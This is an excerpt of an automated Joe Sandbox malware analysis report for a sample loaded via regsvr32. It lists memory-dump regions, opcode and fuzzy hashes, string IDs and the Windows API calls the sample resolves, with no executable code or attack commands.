                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: J3n
                                                                    • API String ID: 0-3694000235
                                                                    • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                    • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                    • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                    • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c&A
                                                                    • API String ID: 0-649646960
                                                                    • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                    • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                    • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                    • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (3
                                                                    • API String ID: 0-2570504824
                                                                    • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                    • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                    • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                    • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [r\^
                                                                    • API String ID: 0-4041245994
                                                                    • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                    • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                    • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                    • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X
                                                                    • API String ID: 0-1684620495
                                                                    • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                    • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                    • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                    • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [[x
                                                                    • API String ID: 0-2553898450
                                                                    • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                    • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                    • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                    • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g\&
                                                                    • API String ID: 0-1994035986
                                                                    • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                    • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                    • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                    • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X
                                                                    • API String ID: 0-1684620495
                                                                    • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                    • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                    • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                    • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GfMu
                                                                    • API String ID: 0-241548529
                                                                    • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                    • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                    • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                    • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k|
                                                                    • API String ID: 0-998972391
                                                                    • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                    • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                    • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                    • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wz_
                                                                    • API String ID: 0-2163964638
                                                                    • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                    • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                    • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                    • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {?Q
                                                                    • API String ID: 0-927583641
                                                                    • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                    • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                    • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                    • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |}6\
                                                                    • API String ID: 0-3074799505
                                                                    • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                    • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                    • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                    • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3&a
                                                                    • API String ID: 0-537350193
                                                                    • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                    • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                    • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                    • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o0:X
                                                                    • API String ID: 0-645126758
                                                                    • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                    • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                    • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                    • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D4}
                                                                    • API String ID: 0-491520632
                                                                    • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                    • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                    • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                    • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 1583075380-0
                                                                    • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                    • Instruction ID: f4426166551a0274cbc87ea506d96dde31d773f972a28dc170ac183a140d78d8
                                                                    • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                    • Instruction Fuzzy Hash: 05A17332B1878142DB749F25B62E7FEB652AB85BC4F488135DE5D9BB49CE3CE0198300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                    • Instruction ID: e20658b1ba342f157d4c79a616f149a8f222f128f62218160613c75f8644dd6f
                                                                    • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                    • Instruction Fuzzy Hash: AF711872F086064BD36CCF18F96767876AAE7E4344F489075D61ACAB94EE38F9048700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                    • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                    • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                    • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                    • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                    • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                    • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                    • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                    • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                    • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                    • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                    • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                    • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
                                                                    • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                    • Opcode Fuzzy Hash: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
                                                                    • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
• Instruction ID: 47b9592adb7e78db4e48c04d600737f97c6ae92c5f15828eef4319a7037fd6b9
• Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
• Instruction Fuzzy Hash: D6419422A55681C1EB74EFA2F8672BD5360AF84B84F046071DB6D8A9A6CE15D849C350
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD0F5
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD111
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD139
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD142
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD158
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD161
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD177
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD180
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD19E
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD1A7
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD1D9
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD1E8
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD240
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD260
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD279
Strings
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                    • API String ID: 3085332118-232180764
                                                                    • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                    • Instruction ID: 50871ee6c385e2d3d32109aadfcd13d758faa3e2a528b0cd3970563260d46699
                                                                    • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                    • Instruction Fuzzy Hash: 9251B420A0AB4390FEA5EF52B86E2742390AF85BD4F4405F5DD6E877A5EE3CE54D8201
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9C07CE), ref: 00007FF8CA9C02F9
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9C07CE), ref: 00007FF8CA9C030D
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9C07CE), ref: 00007FF8CA9C0410
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
